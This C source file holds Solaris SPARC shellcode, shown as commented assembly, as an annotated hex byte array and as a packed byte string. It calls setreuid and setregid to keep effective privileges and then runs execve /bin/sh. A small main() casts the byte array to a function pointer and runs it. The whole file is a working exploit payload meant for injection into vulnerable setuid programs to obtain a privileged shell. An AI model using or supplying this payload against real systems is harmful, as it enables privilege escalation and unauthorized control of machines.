/* * Solaris shellcode - setreuid(geteuid()), setregid(getegid()), execve /bin/sh * * Claes M. Nyberg 20020124 * , */ #include /********************************************************************** void main(void) { __asm__(" ! geteuid() mov 24, %g1 ! g1 = 24 = SYS_getuid ta 0x8 ! getuid() add %o1, 0x1, %o0 ! o0 = o1 = euid +1 ! setreuid() dec %o0 ! o= = euid mov -1, %o1 ! o1 = 0xffffffff mov 202, %g1 ! g1 = 23 = SYS_setreuid ta 8 ! setreuid(geteuid(), -1); ! getegid() mov 47, %g1 ! g1 = 47 = SYS_getgid ta 8 ! getgid(); add %o1, 0x1, %o0 ! o0 = o1 = egid +1 ! setregid() dec %o0 ! o0 = egid mov -1, %o1 ! o1 = 0xffffffff mov 203, %g1 ! g1 = 203 = SYS_setregid() ta 8 ! setregid(getegid(), -1); ! execve(bin/sh ..) xor %o2, %o2, %o2 ! o2 = 0 => envp = NULL set 0x2f62696e, %l0 ! l0 = '/bin' set 0x2f2f7368, %l1 ! l1 = '//sh' st %o2, [%sp - 4] ! String ends with NULL st %l1, [%sp - 8] ! Write //sh to stack st %l0, [%sp - 12] ! Write /bin to stack sub %sp, 12, %o0 ! o0 = &string st %o2, [%sp - 16] ! argv[1] = NULL st %o0, [%sp - 20] ! argv[0] = &string sub %sp, 20, %o1 ! o1 = &string mov 0x3b, %g1 ! g1 = 59 = SYS_execve ta 8 ! execve(argv[0], argv, NULL); ! exit() mov 1, %g1 ! g1 = 1 = SYS_exit ta 8 ! exit(); "); } **********************************************************************/ static char solaris_code[] = /* geteuid() */ "\x82\x10\x20\x18" /* mov 24, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\x90\x02\x60\x01" /* add %o1, 1, %o0 */ /* setreuid() */ "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */ "\x92\x10\x3f\xff" /* mov -1, %o1 */ "\x82\x10\x20\xca" /* mov 202, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* getegid() */ "\x82\x10\x20\x2f" /* mov 47, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ "\x90\x02\x60\x01" /* add %o1, 1, %o0 */ /* setregid() */ "\x90\x22\x20\x01" /* sub %o0, 1, %o0 */ "\x92\x10\x3f\xff" /* mov -1, %o1 */ "\x82\x10\x20\xcb" /* mov 203, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* execve(/bin/sh ..) */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */ "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 */ "\x23\x0b\xcb\xdc" /* sethi %hi(0x2f2f7000), %l1 */ "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 */ "\xd4\x23\xbf\xfc" /* st %o2, [%sp - 4] */ "\xe2\x23\xbf\xf8" /* st %l1, [%sp - 8] */ "\xe0\x23\xbf\xf4" /* st %l0, [%sp - 12] */ "\x90\x23\xa0\x0c" /* sub %sp, 12, %o0 */ "\xd4\x23\xbf\xf0" /* st %o2, [%sp - 16] */ "\xd0\x23\xbf\xec" /* st %o0, [%sp - 20] */ "\x92\x23\xa0\x14" /* sub %sp, 20, %o1 */ "\x82\x10\x20\x3b" /* mov 59, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ /* exit() */ "\x82\x10\x20\x01" /* mov 1, %g1 */ "\x91\xd0\x20\x08"; /* ta 0x8 */ static char _solaris_code[] = "\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22" "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xca\x91\xd0\x20\x08" "\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22" "\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08" "\x94\x1a\x80\x0a\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b" "\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8" "\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23" "\xbf\xec\x92\x23\xa0\x14\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x82\x10\x20\x01\x91\xd0\x20\x08"; int main(void) { void (*code)() = (void *)_solaris_code; printf("Shellcode length: %d\n", strlen(_solaris_code)); code(); return(1); }